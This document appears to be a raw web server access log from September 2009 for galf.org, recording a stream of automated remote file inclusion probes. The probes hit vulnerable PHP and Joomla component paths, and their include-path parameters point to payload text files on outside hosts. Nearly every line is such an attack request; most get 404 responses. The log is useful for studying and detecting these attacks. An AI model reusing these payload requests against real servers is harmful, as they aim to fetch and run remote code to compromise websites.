80.67.26.96 - - [07/Sep/2009:07:13:49 -0700] "GET /logs/access_090330.log/includes/ktedit/toolbar.php?dirDepth=http://asociados.edu.do/administrator/components/com_moofaq/css/sape?%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
67.195.115.244 - - [07/Sep/2009:07:13:55 -0700] "GET /cendoc.php HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
94.75.245.36 - - [07/Sep/2009:07:13:55 -0700] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://beep-beep.ru/scripts/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
94.75.245.36 - - [07/Sep/2009:07:13:55 -0700] "GET /includes/ktedit/toolbar.php?dirDepth=http://beep-beep.ru/scripts/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
94.75.245.36 - - [07/Sep/2009:07:13:58 -0700] "GET /logs/access_090330.log%20%20/includes/ktedit/toolbar.php?dirDepth=http://beep-beep.ru/scripts/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.4.8.14 - - [07/Sep/2009:07:13:58 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.4.8.14 - - [07/Sep/2009:07:13:58 -0700] "GET /logs/access.log//admin/business_inc/saveserver.php?thisdir=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.4.8.14 - - [07/Sep/2009:07:13:58 -0700] "GET /admin/business_inc/saveserver.php?thisdir=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.4.8.14 - - [07/Sep/2009:07:13:59 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.4.8.14 - - [07/Sep/2009:07:13:59 -0700] "GET /admin/business_inc/saveserver.php?thisdir=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.4.8.14 - - [07/Sep/2009:07:13:59 -0700] "GET /logs/access.log//admin/business_inc/saveserver.php?thisdir=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
80.67.26.96 - - [07/Sep/2009:07:14:14 -0700] "GET /logs/access_090525.log/includes/ktedit/toolbar.php?dirDepth=http://asociados.edu.do/administrator/components/com_moofaq/css/sape?%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
94.75.245.36 - - [07/Sep/2009:07:14:35 -0700] "GET /logs/access_090525.log%20%20/includes/ktedit/toolbar.php?dirDepth=http://beep-beep.ru/scripts/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.64.84.44 - - [07/Sep/2009:07:14:37 -0700] "GET /lostpasswd.php?env[include_prefix]=http://www.seorakhoney.com/shop/mail/kts.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.64.84.44 - - [07/Sep/2009:07:14:37 -0700] "GET /lostpasswd.php?env[include_prefix]=http://www.seorakhoney.com/shop/mail/kts.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.64.84.44 - - [07/Sep/2009:07:15:29 -0700] "GET /lostpasswd.php?env[include_prefix]=http://www.hotlinkfiles.com/files/2726381_gsos7/injected.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
94.75.245.36 - - [07/Sep/2009:07:15:30 -0700] "GET /logs/access_090525.log/includes/ktedit/toolbar.php?dirDepth=http://asociados.edu.do/administrator/components/com_moofaq/css/sape?%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.galf.org"
114.4.8.14 - - [07/Sep/2009:07:15:52 -0700] "GET /logs/access.log%20%20//admin/business_inc/saveserver.php?thisdir=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.4.8.14 - - [07/Sep/2009:07:15:56 -0700] "GET /logs/access.log%20%20//admin/business_inc/saveserver.php?thisdir=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
216.65.20.79 - - [07/Sep/2009:07:16:21 -0700] "GET /logs/access_090720.log%20/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.ssp.co.id/admin/admin/id.txt???? HTTP/1.0" 404 275 "-" "libwww-perl/5.814" "www.galf.org"
216.65.20.79 - - [07/Sep/2009:07:16:21 -0700] "GET /logs/access_090309.log%20/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.ssp.co.id/admin/admin/id.txt???? HTTP/1.0" 404 275 "-" "libwww-perl/5.814" "www.galf.org"
114.4.8.14 - - [07/Sep/2009:07:16:28 -0700] "GET /logs/access_090504.log%20%20//admin/business_inc/saveserver.php?thisdir=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.4.8.14 - - [07/Sep/2009:07:16:30 -0700] "GET /logs/access_090504.log%20%20//admin/business_inc/saveserver.php?thisdir=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
117.110.59.2 - - [07/Sep/2009:07:17:52 -0700] "GET /?mosConfig_absolute_path=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
117.110.59.2 - - [07/Sep/2009:07:17:52 -0700] "GET /logs/access_090323.log%20%20/?mosConfig_absolute_path=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
117.110.59.2 - - [07/Sep/2009:07:17:52 -0700] "GET /logs/?mosConfig_absolute_path=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
93.158.148.30 - - [07/Sep/2009:07:17:57 -0700] "GET / HTTP/1.1" 200 1048 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.galf.org"
117.110.59.2 - - [07/Sep/2009:07:18:00 -0700] "GET /logs/access_090518.log%20%20/?mosConfig_absolute_path=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.188 - - [07/Sep/2009:07:19:13 -0700] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.188 - - [07/Sep/2009:07:19:13 -0700] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.188 - - [07/Sep/2009:07:19:13 -0700] "GET /logs/access_090525.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
194.105.193.46 - - [07/Sep/2009:07:19:14 -0700] "GET /logs/access_090330.log/includes/ktedit/toolbar.php?dirDepth=http://asociados.edu.do/administrator/components/com_moofaq/css/sape?%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.galf.org"
194.105.193.46 - - [07/Sep/2009:07:19:14 -0700] "GET /includes/ktedit/toolbar.php?dirDepth=http://asociados.edu.do/administrator/components/com_moofaq/css/sape?%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.galf.org"
222.236.47.188 - - [07/Sep/2009:07:19:14 -0700] "GET /logs/access_090525.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.188 - - [07/Sep/2009:07:19:14 -0700] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.188 - - [07/Sep/2009:07:19:14 -0700] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
194.105.193.46 - - [07/Sep/2009:07:19:18 -0700] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://asociados.edu.do/administrator/components/com_moofaq/css/sape?%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.galf.org"
117.110.59.2 - - [07/Sep/2009:07:19:26 -0700] "GET /?mosConfig_absolute_path=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
117.110.59.2 - - [07/Sep/2009:07:19:26 -0700] "GET /logs/access_090323.log%20%20/?mosConfig_absolute_path=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
117.110.59.2 - - [07/Sep/2009:07:19:26 -0700] "GET /logs/?mosConfig_absolute_path=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
117.110.59.2 - - [07/Sep/2009:07:19:33 -0700] "GET /logs/access_090518.log%20%20/?mosConfig_absolute_path=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
117.110.59.2 - - [07/Sep/2009:07:19:37 -0700] "GET /logs/access_090323.log/?mosConfig_absolute_path=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
117.110.59.2 - - [07/Sep/2009:07:19:37 -0700] "GET /?mosConfig_absolute_path=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
117.110.59.2 - - [07/Sep/2009:07:19:37 -0700] "GET /logs/?mosConfig_absolute_path=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
117.110.59.2 - - [07/Sep/2009:07:19:47 -0700] "GET /logs/access_090518.log/?mosConfig_absolute_path=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
94.75.245.36 - - [07/Sep/2009:07:19:58 -0700] "GET /logs/access.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://beep-beep.ru/scripts/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
216.65.20.79 - - [07/Sep/2009:07:20:02 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.galf.org"
216.65.20.79 - - [07/Sep/2009:07:20:02 -0700] "GET /logs/access_090302.log/akocomments.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.galf.org"
216.65.20.79 - - [07/Sep/2009:07:20:02 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.galf.org"
216.65.20.79 - - [07/Sep/2009:07:20:12 -0700] "GET /logs/access_090727.log/akocomments.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.galf.org"
194.105.193.46 - - [07/Sep/2009:07:21:41 -0700] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://asociados.edu.do/administrator/components/com_moofaq/css/sape?%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "galf.org"
194.105.193.46 - - [07/Sep/2009:07:21:41 -0700] "GET /logs/access.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://asociados.edu.do/administrator/components/com_moofaq/css/sape?%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "galf.org"
194.105.193.46 - - [07/Sep/2009:07:21:41 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://asociados.edu.do/administrator/components/com_moofaq/css/sape?%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "galf.org"
211.189.18.73 - - [07/Sep/2009:07:22:00 -0700] "GET /logs/access.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
211.189.18.73 - - [07/Sep/2009:07:22:01 -0700] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
194.105.193.46 - - [07/Sep/2009:07:22:32 -0700] "GET /logs/access_090525.log/includes/ktedit/toolbar.php?dirDepth=http://asociados.edu.do/administrator/components/com_moofaq/css/sape?%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.galf.org"
69.64.84.44 - - [07/Sep/2009:07:23:16 -0700] "GET /?mosConfig_admin_path=http://www.samjinenginc.com/board/readme.txt??? HTTP/1.1" 200 1048 "-" "libwww-perl/5.805" "www.galf.org"
69.64.84.44 - - [07/Sep/2009:07:23:21 -0700] "GET /?mosConfig_admin_path=http://www.samjinenginc.com/board/readme.txt??? HTTP/1.1" 200 1048 "-" "libwww-perl/5.805" "www.galf.org"
65.55.209.193 - - [07/Sep/2009:07:23:25 -0700] "GET /logs/ HTTP/1.1" 200 4799 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
65.38.188.164 - - [07/Sep/2009:07:24:29 -0700] "GET /logs/access_090309.log///e404.php?DOCUMENT_ROOT=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.38.188.164 - - [07/Sep/2009:07:24:29 -0700] "GET //e404.php?DOCUMENT_ROOT=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.38.188.164 - - [07/Sep/2009:07:24:29 -0700] "GET /logs///e404.php?DOCUMENT_ROOT=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.38.188.164 - - [07/Sep/2009:07:24:43 -0700] "GET /logs/access_090223.log///e404.php?DOCUMENT_ROOT=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.38.188.164 - - [07/Sep/2009:07:24:54 -0700] "GET //e404.php?DOCUMENT_ROOT=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.38.188.164 - - [07/Sep/2009:07:24:54 -0700] "GET /logs/access_090309.log///e404.php?DOCUMENT_ROOT=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.38.188.164 - - [07/Sep/2009:07:24:54 -0700] "GET /logs///e404.php?DOCUMENT_ROOT=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.38.188.164 - - [07/Sep/2009:07:25:00 -0700] "GET /logs/access_090223.log///e404.php?DOCUMENT_ROOT=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
217.117.85.108 - - [07/Sep/2009:07:25:20 -0700] "GET /includes/ktedit/toolbar.php?dirDepth=http://beep-beep.ru/scripts/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
217.117.85.108 - - [07/Sep/2009:07:25:20 -0700] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://beep-beep.ru/scripts/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
217.117.85.108 - - [07/Sep/2009:07:25:23 -0700] "GET /logs/access_090330.log%20%20/includes/ktedit/toolbar.php?dirDepth=http://beep-beep.ru/scripts/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
117.110.59.2 - - [07/Sep/2009:07:25:59 -0700] "GET /?mosConfig_absolute_path=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
117.110.59.2 - - [07/Sep/2009:07:26:00 -0700] "GET /logs/?mosConfig_absolute_path=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
117.110.59.2 - - [07/Sep/2009:07:26:00 -0700] "GET /logs/access_090323.log/?mosConfig_absolute_path=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.38.188.164 - - [07/Sep/2009:07:26:01 -0700] "GET /logs/access_090309.log%20%20///e404.php?DOCUMENT_ROOT=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.38.188.164 - - [07/Sep/2009:07:26:02 -0700] "GET /logs/access_090223.log%20%20///e404.php?DOCUMENT_ROOT=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.38.188.164 - - [07/Sep/2009:07:26:06 -0700] "GET /logs/access_090309.log%20%20///e404.php?DOCUMENT_ROOT=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.38.188.164 - - [07/Sep/2009:07:26:07 -0700] "GET /logs/access_090223.log%20%20///e404.php?DOCUMENT_ROOT=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
117.110.59.2 - - [07/Sep/2009:07:26:09 -0700] "GET /logs/access_090518.log/?mosConfig_absolute_path=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
217.117.85.108 - - [07/Sep/2009:07:27:11 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://beep-beep.ru/scripts/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
217.117.85.108 - - [07/Sep/2009:07:27:11 -0700] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://beep-beep.ru/scripts/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
217.117.85.108 - - [07/Sep/2009:07:27:14 -0700] "GET /logs/access.log%20%20/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://beep-beep.ru/scripts/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
69.64.84.44 - - [07/Sep/2009:07:28:19 -0700] "GET /logs/access_090316.log/?mosConfig_admin_path=http://www.samjinenginc.com/board/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.64.84.44 - - [07/Sep/2009:07:28:20 -0700] "GET /?mosConfig_admin_path=http://www.samjinenginc.com/board/readme.txt??? HTTP/1.1" 200 1048 "-" "libwww-perl/5.805" "www.galf.org"
69.64.84.44 - - [07/Sep/2009:07:28:20 -0700] "GET /logs/?mosConfig_admin_path=http://www.samjinenginc.com/board/readme.txt??? HTTP/1.1" 200 4799 "-" "libwww-perl/5.805" "www.galf.org"
69.64.84.44 - - [07/Sep/2009:07:28:40 -0700] "GET /logs/access_090316.log/?mosConfig_admin_path=http://www.samjinenginc.com/board/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.64.84.44 - - [07/Sep/2009:07:28:40 -0700] "GET /?mosConfig_admin_path=http://www.samjinenginc.com/board/readme.txt??? HTTP/1.1" 200 1048 "-" "libwww-perl/5.805" "www.galf.org"
69.64.84.44 - - [07/Sep/2009:07:28:40 -0700] "GET /logs/?mosConfig_admin_path=http://www.samjinenginc.com/board/readme.txt??? HTTP/1.1" 200 4799 "-" "libwww-perl/5.805" "www.galf.org"
69.64.84.44 - - [07/Sep/2009:07:29:19 -0700] "GET /logs/access.log//lostpasswd.php?env[include_prefix]=http://www.seorakhoney.com/shop/mail/kts.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.64.84.44 - - [07/Sep/2009:07:29:19 -0700] "GET /lostpasswd.php?env[include_prefix]=http://www.seorakhoney.com/shop/mail/kts.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.64.84.44 - - [07/Sep/2009:07:29:19 -0700] "GET /logs/access.log//lostpasswd.php?env[include_prefix]=http://www.seorakhoney.com/shop/mail/kts.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.64.84.44 - - [07/Sep/2009:07:29:19 -0700] "GET /logs//lostpasswd.php?env[include_prefix]=http://www.seorakhoney.com/shop/mail/kts.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.64.84.44 - - [07/Sep/2009:07:29:19 -0700] "GET /lostpasswd.php?env[include_prefix]=http://www.seorakhoney.com/shop/mail/kts.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.64.84.44 - - [07/Sep/2009:07:29:20 -0700] "GET /logs//lostpasswd.php?env[include_prefix]=http://www.seorakhoney.com/shop/mail/kts.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.117.85.108 - - [07/Sep/2009:07:30:04 -0700] "GET /logs/access_090525.log%20%20/includes/ktedit/toolbar.php?dirDepth=http://beep-beep.ru/scripts/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.64.84.44 - - [07/Sep/2009:07:31:05 -0700] "GET /logs/access_090720.log/?mosConfig_admin_path=http://www.samjinenginc.com/board/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.65.20.79 - - [07/Sep/2009:07:31:24 -0700] "GET /logs/access_090302.log/akocomments.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.galf.org"
216.65.20.79 - - [07/Sep/2009:07:31:24 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.galf.org"
216.65.20.79 - - [07/Sep/2009:07:31:24 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.galf.org"
216.65.20.79 - - [07/Sep/2009:07:31:26 -0700] "GET /logs/access_090727.log/akocomments.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.galf.org"
222.122.72.216 - - [07/Sep/2009:07:31:41 -0700] "GET /logs/access_090309.log%20%20//include/write.php?dir=http://www.compassionbydesign.org/wp-content/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.122.72.216 - - [07/Sep/2009:07:31:41 -0700] "GET /logs//include/write.php?dir=http://www.compassionbydesign.org/wp-content/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
93.99.254.254 - - [07/Sep/2009:07:34:28 -0700] "GET /index.php?id=http://www.hotlinkfiles.com/files/2792220_datae/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
93.99.254.254 - - [07/Sep/2009:07:34:33 -0700] "GET /logs/access.log%20%20//index.php?id=http://www.hotlinkfiles.com/files/2792220_datae/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
93.99.254.254 - - [07/Sep/2009:07:34:33 -0700] "GET /logs//index.php?id=http://www.hotlinkfiles.com/files/2792220_datae/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.122.72.216 - - [07/Sep/2009:07:34:36 -0700] "GET /logs/access_090420.log%20%20//include/write.php?dir=http://www.compassionbydesign.org/wp-content/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [07/Sep/2009:07:35:36 -0700] "GET /e404.php?DOCUMENT_ROOT=http://saint56.pe.kr//bbs/skin/uks_vote_v3021/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
117.110.59.2 - - [07/Sep/2009:07:37:48 -0700] "GET /logs/access.log//lostpasswd.php?env[include_prefix]=http://www.netrealit.cz/loga/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
117.110.59.2 - - [07/Sep/2009:07:37:49 -0700] "GET /lostpasswd.php?env[include_prefix]=http://www.netrealit.cz/loga/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
117.110.59.2 - - [07/Sep/2009:07:37:50 -0700] "GET /logs//lostpasswd.php?env[include_prefix]=http://www.netrealit.cz/loga/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
81.24.35.80 - - [07/Sep/2009:07:38:59 -0700] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "galf.org"
81.24.35.80 - - [07/Sep/2009:07:38:59 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "galf.org"
81.24.35.80 - - [07/Sep/2009:07:38:59 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "galf.org"
69.64.84.44 - - [07/Sep/2009:07:39:00 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.cascadecollision.com////components/dialog/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.64.84.44 - - [07/Sep/2009:07:39:00 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.cascadecollision.com////components/dialog/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
